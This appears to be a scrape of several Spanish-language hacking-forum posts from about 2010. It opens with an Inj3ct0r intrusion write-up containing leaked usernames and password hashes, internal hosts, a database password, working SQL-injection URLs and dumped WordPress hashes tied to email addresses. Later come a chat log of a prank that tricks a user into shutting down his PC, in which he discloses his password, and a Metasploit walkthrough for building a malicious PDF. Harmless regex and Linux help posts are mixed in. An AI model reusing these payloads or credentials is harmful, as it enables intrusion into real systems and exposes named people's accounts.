    ['user_name'] : ['user_pass']


    [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
    [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
    [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
    [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
    [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
    [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
    [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
    [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
    [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
    [10] Bsudbury: [10] 827d07956629c37855f3518374821872:
    [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
    [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
    [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
    [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
    [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
    [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
    [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
    [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
    [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
    [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
    [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
    [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
    [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
    [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
    [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
    [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
    [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
    [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
    [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
    [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
    [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
    [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
    [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
    [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
    [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
    [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
    [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
    [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
    [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
    [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
    [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
    [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
    [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
    [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
    [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
    [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
    [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
    [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
    [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
    [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
    [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
    [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
    [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
    [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
    [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
    [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
    [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
    [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
    [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
    [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
    [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
    [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
    [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
    [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
    [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
    [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
    [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
    [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
    [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
    [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
    [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
    [72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
    [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
    [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
    [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
    [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
    [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
    [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
    [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
    [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
    [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
    [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
    [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
    [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
    [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
    [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
    [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
    [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
    [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
    [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
    [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
    [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
    [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
    [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
    [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
    [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:

    ---------------------------------------------------------------------------------------------------------------------------------------------------

    read /etc/hosts

    127.0.0.1 localhost localhost.localdomain
    192.168.1.167 140696-db2.flufffriends.com 140696-db2
    192.168.1.166 140695-db1.flufffriends.com 140695-db1
    192.168.1.165 140694-web2.flufffriends.com 140694-web2
    192.168.1.164 140693-web1.flufffriends.com 140693-web1
    69.63.176.141 api.facebook.com
    208.116.17.80 peanutlabs.com

    ----------------------------------

    /etc/my.cnf

    #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1

    log-bin=/var/lib/mysqllogs/bin-log

    binlog-do-db=fluff2

    expire-logs-days=14



    server-id = 5



    #master-host=69.63.176.141

    #master-user=romis_user

    #master-password=romis0123

    #master-connect-retry=60

    replicate-do-db=miserman


    #log-slave-updates

    expire_logs_days = 14


    I think we found a sufficient number of vulnerabilities!

    ---------------------------

      __             __      __    
    /'__`\         /'__`\  /'__`\  
    /\ \/\ \  __  _/\ \/\ \/\_\L\ \  
    \ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
    \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
     \ \____//\_/\_\\ \____/\ \____/
      \/___/ \//\/_/ \/___/  \/___/
         [Inj3ct0r Crash Exploit]



    So .. Moving on to the fun friends

    To avoid Vandal effects of script-kidds I will not give you a link to shell.php, but I enclose you images and some interesting queries =]

    ..> Inj3ct0rExploit start . + . + . + . + . + . + .

    wp_posts

    post_password

    wp_users

    user_pass

    done.....


    WordPress! oO one of the modules installed in facebook is Wordpress!


    check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1


    oooooooooooooooooooooooooooo

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116

    Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67

    3 <= ALERT! Users! =]

    Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124

    oooooooooooooooooooooooooooo

    ..> Inj3ct0r_Crach_exploit [ENTER]

    user:

    admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
    lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
    tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.

    cracker:

    admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
    lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
    tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.   :tom:tom_kincaid@hotmail.com

    see request:


    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
    http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--



    goOd =] Nice Hacking old school xD


      __             __   __ __      
    /'__`\         /'__`\/\ \\ \    
    /\ \/\ \  __  _/\ \/\ \ \ \\ \    
    \ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_  
    \ \ \_\ \/>  </\ \ \_\ \ \__ ,__\
     \ \____//\_/\_\\ \____/\/_/\_\_/
      \/___/ \//\/_/ \/___/    \/_/  
              [Conclusion]

                                       

    There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)



      __             __   ______    
    /'__`\         /'__`\/\  ___\  
    /\ \/\ \  __  _/\ \/\ \ \ \__/  
    \ \ \ \ \/\ \/'\ \ \ \ \ \___``\
    \ \ \_\ \/>  </\ \ \_\ \/\ \L\ \
     \ \____//\_/\_\\ \____/\ \____/
      \/___/ \//\/_/ \/___/  \/___/
                [Greetz]



    Greetz all Member Inj3ct0r.com

    Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]

    Personally h4x0rz:

    0x1D, Z0m!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX, however, n1gh7m4r3, StutM (unitx.net) , Andrew Horton..

    You are good hackers. Respect y0u!

    Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!


    At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook.zip

    We want to thank the following people for their contribution.

    Do not forget to keep track of vulnerabilities in Inj3ct0r.com

    GoOd luck Hackers! =]


    # Inj3ct0r.com [2010-04-06]
#198
He tenido en mente, personalizar mis objetos que tengo junto a mi laptop y también podría hacerlo con ella. Pero es que no se que usar, por ejemplo: Quiero realizar un graffiti en el mouse, que debería usar para que no se despintará fácilmente. Si uso pinturas comunes y corrientes quedaría una capa muy gruesa y sería fastidioso, no existe algún tipo de pintura que pueda usar en este caso. Os dejo una imagen de mi mouse, para que vean que la textura es como pasta.

#199
Foro Libre / Re Pwned!
4 Junio 2010, 07:31 AM
Googleando un poco me contre una conversación que joder si que es estúpida, pero lo peor de todo, es que parece que es real.

Usuarios:

Inicio de la conversación:
Citar(23:03) diosdelared.com: ola cereal
q tal te habla godmurdoc
(23:04) diosdelared.com: ola
(23:08) diosdelared.com: ola ceral
cereal
:S
(23:09) CereaL: hola identificate
(23:10) diosdelared.com: godmurdoc
men
(23:10) CereaL: mi detector de ovnis no te a identificado
di la clave secreta
(23:10) diosdelared.com: plop:S
:$
(23:10) CereaL: denied
repita despues de pi la clave secreta
piiiiiiiiiiiiiiiiiiiii
(23:10) diosdelared.com: mmmmm?
(23:11) CereaL: luego de la señal diga la clave secreta
(23:11) diosdelared.com: quiero q me hagas un favor bro
(23:11) CereaL: piiiiiiiiiiiiiiiii
(23:11) diosdelared.com: quiero q me hagas un favor
(23:11) CereaL: para favores precione 2
(23:11) diosdelared.com: mmmm2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
(23:12) CereaL: por favor precione el numero 2 despues de la señal
piiiiiiiiiiiii
(23:12) diosdelared.com: 2
(23:12) CereaL: escriba F mayuscula dos puntos y el favor que presisa luego de la señal presione 2
piiiiiiiiiiiiii
(23:13) diosdelared.com: F:2
men dejate de jugar conmigo y quiro q me hagas un favor
(23:13) diosdelared.com: bro
dime si puedes o no
(23:15) diosdelared.com: q paso ceral
(23:15) CereaL: dime que nesesitas
(23:15) diosdelared.com: oe men dime un favro sabes ayer he tenido un pequeñlo problema
con mi blog
no se q paso pero paraece q han cambiado mi pass
(23:15) diosdelared.com: xd cada ves q pongop el pass no me sale
nada me es como si hubieran cambaiado el pass
ave rsi puedes regfresar mi pass
(23:16) CereaL: mira
(23:16) diosdelared.com: xd favro eso no mas te ìdo
(23:16) CereaL: sigue mis instrucciones
es por las cookies
(23:16) CereaL: primero ve al navegador
(23:16) diosdelared.com: y no te jodo mas
(23:16) CereaL: donde dice opciones
en opciones dice herramientas
(23:17) CereaL: entre martillos palas y pinsas tiene q decir borrar historial
luego borras todo
ve a cmd
(23:17) CereaL: inicio>ejecutar>cmd
tipea
(23:17) diosdelared.com: y q mas
(23:18) CereaL: pon
dir
y luego cls
y se abra borrado toda la pantalla
luego habres un block de notas
pones
(23:18) CereaL: start ddlrcookies.bat
y guardas el texto
con el mismo nombre
osea
(23:19) CereaL: ddlrcookies.bat
y luego le das doble click
si no te funciona reinicias el ordenador y ya kedara todo listo
entendiste
?
(23:19) diosdelared.com: me crees ta idiota
men pero dime con esa instruciones
mi pass sera el mismo o seracaul sera mi pass
(23:20) CereaL: tu pass se reseteara
y kedara
como el primero q pusiste man
(23:20) CereaL: para eso es el ddlrcookies.bat
si no me crees preguntale a murder y veras q tengo razon
(23:20) diosdelared.com: murder no esta en liena
men
(23:22) CereaL: pss
(23:22) diosdelared.com: ore men dime cuando dice el navegador tines estar con www.diosdelared.com
(23:22) CereaL: claro
por supuesto
sino el ddlrcookies.bat no funcionara
(23:27) diosdelared.com: oe men
(23:27) CereaL: dime
(23:28) diosdelared.com: mira bro
(23:29) diosdelared.com: Detuviste compartiendo fotos
(23:29) CereaL: bueno
y el
ddlrcookies.bat
ya lo ejecutaste?
cuando lo ejecutes
pasame screem
(23:29) CereaL: para ver si esta biem
(23:30) diosdelared.com: todavia no entro al blog d enotas :S
(23:30) diosdelared.com ha cambiado su estado a No disponible
(23:30) diosdelared.com ha cambiado su estado a Conectado
(23:30) diosdelared.com ha cambiado su estado a No disponible
(23:30) diosdelared.com ha cambiado su estado a Conectado
(23:30) CereaL: pues bueno
ejectutar>notepad.exe
(23:38) diosdelared.com: no mesale ,men
hixe lo q me dijiste
(23:38) diosdelared.com: pero and q ver prme :D
;$
(23:40) diosdelared.com: nad amen
ptmr:S
(23:42) CereaL: q paso :S?
(23:42) diosdelared.com: nad men lo piedes hace rxd mi men es q lo hice y no me sale ptmr:D
:%
(23:44) CereaL: deja keres q te pase yo el scrip?
(23:44) diosdelared.com: no me mejor sabes
(23:44) diosdelared.com: io te voy a decir como lo hago y me lase algo mal me jalas la oreja
aver ps
(23:44) CereaL: jklasdjl
(23:47) CereaL: decime como es tu acount
en didosdelared
tu cuenta
(23:47) diosdelared.com: mi pass
es sir3
sir31dov
(23:48) CereaL: no no
tu pass no
tu cuenta
tu user
(23:48) diosdelared.com: godmurdoc
(23:49) diosdelared.com: nad men lo hixe q me pediste
y nada q ver nada con el pass
ayudame xd fis
(23:50) CereaL: MIRA
(23:51) diosdelared.com: q miro
(23:51) CereaL: start ddlr.bat
msg * user: godmurdoc
msg * pass: *********
msg * RECUPERANDO PASSWORD
msg * LOADING.
msg * LOADING..
msg * LOADING...
msg * LOADING....
msg * LOADING.....
GUARDA ESO EN UN TXT
(23:51) CereaL: Y LUEGO LO GUARDAS COMO DDLR.BAT
AH ESPERA
ME FALTO ALGO
(23:51) diosdelared.com: es un blovk d enotas
(23:52) diosdelared.com: lo guardo en un bloc de notas
(23:52) CereaL: start ddlr.bat
start http://cereal.diosdelared.com
msg * user: godmurdoc
msg * pass: *********
msg * RECUPERANDO PASSWORD
msg * LOADING.
msg * LOADING..
msg * LOADING...
msg * LOADING....
msg * LOADING.....
ahi ta
puse mi blog
para q tome el referente
eso guarda
en un block de notas
(23:52) CereaL: y luego guardas el blog de notas
(23:52) diosdelared.com: q mas
(23:52) CereaL: como ddlr.bat
y le das doble click y esperas un ratito
hasta q diga finish
(23:53) diosdelared.com: oe men ia no hago el otro prcoedimiento de pioner ejecutar cms
y luego por dir
y despues cls
(23:53) CereaL: no por q ese ya esta echo
lo q faltaba en el .bat
era la url identificante
de diosdelared
q me abia ovidado
(23:54) diosdelared.com: ah chumas
(23:54) CereaL: ejecuta
(23:54) CereaL: y pasame la screen cuando se detenga
(23:54) diosdelared.com: ok
(23:55) Has enviado un zumbido.
(23:55) CereaL: y?
(23:56) diosdelared.com: ---------------------------------------------------------------------
----------------------------------------------------------------------
----------------------------- e4zone.com -----------------------------
----------------------------- e4zone.com -----------------------------
----------------------------- e4zone.com -----------------------------
----------------------------------------------
me sale esto´,mem
(23:56) CereaL: noc man
noc
jem jem
(0:00) diosdelared.com ha cambiado su estado a No disponible
(0:00) diosdelared.com ha cambiado su estado a Conectado
(0:00) diosdelared.com: bro lo ejecuto perono me sale nada
,esañle esa *****
de
un juego bro
(0:01) CereaL: askdljlkdsa noc tu no haces bien las cosas
aver
sabes para q sirve
shutdown.exe?
(0:03) diosdelared.com: sirve para apgar el equipo brp si no me equivo xd q
(0:03) CereaL: si pero tmb sirve para reiniciar suspender
y limpiar los registros
fijate
(0:03) CereaL: ve a ejecutar
cuando estes avisame
(0:06) diosdelared.com: ya estoy men
(0:06) CereaL: pon
shutdown.exe -s -t -1
ejecuta
espera un ratito y luego pon
(0:06) CereaL: recoverid cumbio
var principuto
sudo mucho
(0:11) diosdelared.com: oe cereal cunado pono recoverid cumbio no ejecuta nad amen
(0:11) CereaL: es q tienes q poner primero shutdown.exe -s -t 1
ejecutas
y esperas q te salca un cartelito
(0:12) diosdelared.com: ya llo puse men
(0:12) CereaL: y re100
no man
(0:12) diosdelared.com: aya
(0:12) CereaL: intenta de nuevo
(0:12) diosdelared.com: ps pero es q el
el 1 esta si signo men
(0:12) CereaL: clar
va sin signo man
(0:12) diosdelared.com: cob raxon ps bro
(0:13) diosdelared.com ha cerrado sesión
(0:16) diosdelared.com está conectado
(0:16) diosdelared.com: oe men se me apago la maquina bro jeje
(0:17) diosdelared.com te ha enviado un zumbido.
(0:17) diosdelared.com: ola cereal estas ahi bro
(0:18) diosdelared.com te ha enviado un zumbido.
(0:18) CereaL: si bro q paso?
(0:19) diosdelared.com: se me apago la maquimna men
xd
q
(0:19) CereaL: ah ps
prueba asi
Detuviste compartiendo fotos
(0:19) CereaL: shutdow.exe -s -t 3
con el tres capas te anda
(0:19) diosdelared.com: plop:D
(0:20) diosdelared.com ha cerrado sesión
(0:23) diosdelared.com está conectado
(0:23) diosdelared.com: se mwe apaga men esta q me jodes o esta q me ayudas
(0:23) CereaL:
disculpa fue un error mio
(0:24) diosdelared.com: ni con el 1 no con el 3
(0:24) CereaL: pasa q te puse S y capas el sistema coxmico del cumbio interior del ordenador
sufrio un colapso ormonal
(0:24) diosdelared.com: ah
(0:24) CereaL: y en realidad era R
asi
shutdow.exe -r -t 1
(0:24) CereaL: en ves de shutdow.exe -s -t 1
(0:24) diosdelared.com: mir me aseguras q no se pagas
(0:24) CereaL: prueba con R y dime ahi te tiene q funcionar ;)
(0:24) diosdelared.com: y depues
(0:24) diosdelared.com: q pongo depies
(0:25) CereaL: no no yo lo acabo de probar asi shutdow.exe -r -t 1
y ando perfecto
(0:25) diosdelared.com: depues q pongo
(0:25) CereaL: lo mismo de antes
espera q salga el cartelito
(0:25) diosdelared.com: es como se broo
(0:25) diosdelared.com: es como se borro
(0:25) CereaL: cuando te salga el cartelito dime
(0:26) diosdelared.com ha cerrado sesión
(0:28) diosdelared.com ha sido bloqueado
(0:28) diosdelared.com está conectado

Screen:
http://img215.imageshack.us/img215/4070/gmurdoc.png
http://img211.imageshack.us/img211/5145/godmurdocapagandoelpc.png
http://img179.imageshack.us/img179/31/apagandolapcotravez.png
http://img444.imageshack.us/img444/4797/djsklsdesunboludooooooo.png
http://img228.imageshack.us/img228/9679/lafrutillitadelpostreco.jpg

Fuente: :http://cereal.diosdelared.com/?coment=6283
#200
Bueno, lo que quiero hacer es algo así. Tengo como cadena la siguiente:
Código (bash) [Seleccionar]
:sh:Todavía tenemos posibilidades de clasificarnos, es :sh:difícil,
el panorama :sh:está complicado, pero en eso nos basamos,
:sh:todavía estamos en la Copa :sh:América y queremos quedarnos


Y tengo la siguiente expresión regular. (Un poco loca, pero funciona)
Código (RegExp) [Seleccionar]
/:sh:\w*/

Lo que hace es validar así:
Código (bash) [Seleccionar]
:sh:Todav
:sh:dif
:sh:est
:sh:todav
:sh:Am


Lo hace correctamente, pero como hago para recolectar la información que está después de la expresión regular?, es decir, hago esto para intentar hacer lo que quiero, pero solo me toma sh, quisiera recolectar todo lo que cumple la expresión regular. Como los anteriores.

Código:
Código (php) [Seleccionar]
$txt = ":sh:Todavía tenemos posibilidades de clasificarnos, es :sh:difícil,
el panorama :sh:está complicado, pero en eso nos basamos,
:sh:todavía estamos en la Copa :sh:América y queremos quedarnos";
preg_match_all("/:sh:\w*/", $txt, $captura, PREG_SET_ORDER);
foreach ($captura as $salida){
echo $salida[1];
echo "\n";
}

Resultado:
Código (bash) [Seleccionar]
shellroot@alex-laptop:~/Escritorio$ php PoC.php
sh
sh
sh
sh
sh



Edit: Estaba mirando el código de yoyahack y no se porque puso $salida[1], era $salida[0]. :S Perdón por el POST!
Código (bash) [Seleccionar]
shellroot@alex-laptop:~/Escritorio$ php PoC.php
:sh:Todav
:sh:dif
:sh:est
:sh:todav
:sh:Am
#201
GNU/Linux / Cosa rara con MVware en ubuntu
14 Mayo 2010, 03:43 AM
Después de la instalación (Ayer), se mostraba el MVware dentro del menú 'Herramientas del Sistema', pero ya HOY, no se muestra, trate de instalarlo de nuevo, y me muestra la siguiente ventana.



Mi ingles es una *****, pero creo que dice que ya esta instalado, pero entonces, donde lo busco?
#202
Estaba dentro de backtrack4, pero tenia problemas con mi red inalambrica y sonido y varias cosas más, así que migre a ubuntu 10.04 y todo vá de maravilla, hasta el momento de instalar xampp.

Lo instale de la misma forma que en bt4 y todo bien, lo inicio desde la shell así:
shellroot@alex-laptop:~$ sudo /opt/lampp/lampp start
Starting XAMPP for Linux 1.5.5a...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: XAMPP-MySQL is already running.
XAMPP: XAMPP-ProFTPD is already running.
XAMPP for Linux started.


El problema radica al momento de ingresar al localhost, joder, no me carga la pagina. Que podría ser?
#203
Prueba de Penetración en el Mundo Real

Si usted está cansado de vídeos tipo "Hacking con Netcat"  o donde realizan pruebas de penetración con RPC DCOM/netapi, este vídeo es para ti.


Es una reconstrucción rápida de una prueba de penetración que realizó Offensive Security (Creadores del BackTrack) hace más de un año, la cual han grabado y publicado para disfrute de todos nosotros.

Video: http://vimeo.com/11213607

Leido: :http://www.dragonjar.org/prueba-de-penetracion-en-el-mundo-real.xhtml#more-4238
#204
Incrustar ejecutable dentro de un archivo de Adobe PDF

[Metasploit By: Shell Root]

Retomando un poco lo que es la herramienta 'Metasploit', encontré un exploit donde podemos realizar una incrustación de un archivo ejecutable dentro de un archivo de Adobe PDF.

Descripción del Exploit
Ubicación:/windows/fileformat/adobe_pdf_embedded_exe
Nombre:Adobe PDF Embedded EXE Social Engineering
Versión:0
Plataforma:Windows
Licencia:Metasploit Framework License (BSD)
Rango:Excelente
Proporciando por:Colin Ames <amesc@attackresearch.com>
Objetivos disponibles:Adobe Reader v8.x, v9.x (Windows XP SP3 English)
Descripción:Este módulo del Metasploit incorpora una carga de un archivo PDF existente.

Como podemos ver, el exploit, solo funciona con sistema operativo windows xp en ingles (Windows XP ... English), pero aquí lo haremos portable a un windows en español, ya que es él que nos interesa.

Después de esta breve definición del exploit, vamos a ver como funciona este exploit, primero que todo, para que nos funcione dentro de un sistema operativo windows xp en español, vamos a la linea 232 del exploit, donde reemplazamos este código:
Código (ruby) [Seleccionar]
232. dirs = [ "Desktop", "My Documents", "Documents" ]
por este:
Código (ruby) [Seleccionar]
232. dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos"]
Como vemos de añadimos algunos parámetros necesarios para que nuestro exploit corra en un windows en ingles como también en un windows en español. Después de realizar esto, vamos a generar nuestro PoC!

Abrimos la consola del Metasploit, seleccionamos el exploit, y le ingresamos los parámetros necesarios y lo lanzamos. Inmediatamente se creara el PoC con el archivo pdf "infectado".
root@bt:/opt/metasploit3/msf3# msfconsole

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 540 exploits - 256 auxiliary
+ -- --=[ 207 payloads - 23 encoders - 8 nops
       =[ svn r9040 updated today (2010.04.07)

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > show options

Module options:

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   EXENAME                       no        The Name of payload exe.
   FILENAME    evil.pdf          no        The output filename.
   INFILENAME                    yes       The Input PDF filename.
   OUTPUTPATH  ./data/exploits/  no        The location to output the file.


Exploit target:

   Id  Name
   --  ----
   0   Adobe Reader v8.x, v9.x (Windows XP SP3 English)


msf exploit(adobe_pdf_embedded_exe) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(adobe_pdf_embedded_exe) > set FILENAME PoC_PDF_EXE.pdf
FILENAME => PoC_PDF_EXE.pdf
msf exploit(adobe_pdf_embedded_exe) > set EXENAME /root/cmd.exe
EXENAME => /root/cmd.exe
msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /root/PoC_PDF_EXE_File.pdf
INFILENAME => /root/PoC_PDF_EXE_File.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit
[*] Started bind handler

[*] Reading in '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing '/root/PoC_PDF_EXE_File.pdf'...
[*] Parsing Successful.
[*] Using '/root/cmd.exe' as payload...
[*] Creating 'PoC_PDF_EXE.pdf' file...
[*] Generated output file /root/PoC_PDF_EXE.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) > 


PD: El exploit trabaja con un payload de por medio, como vieron solo seleccione el payload bind_tcp, ya que no surge ningun efecto a la hora de ejecutar el PoC. Esto si seria necesario a la hora de ejecutar un payload convertido en ejecutable.

Nos genero el archivo PDF correctamente, ahora miremos nuestro PoC en acción.



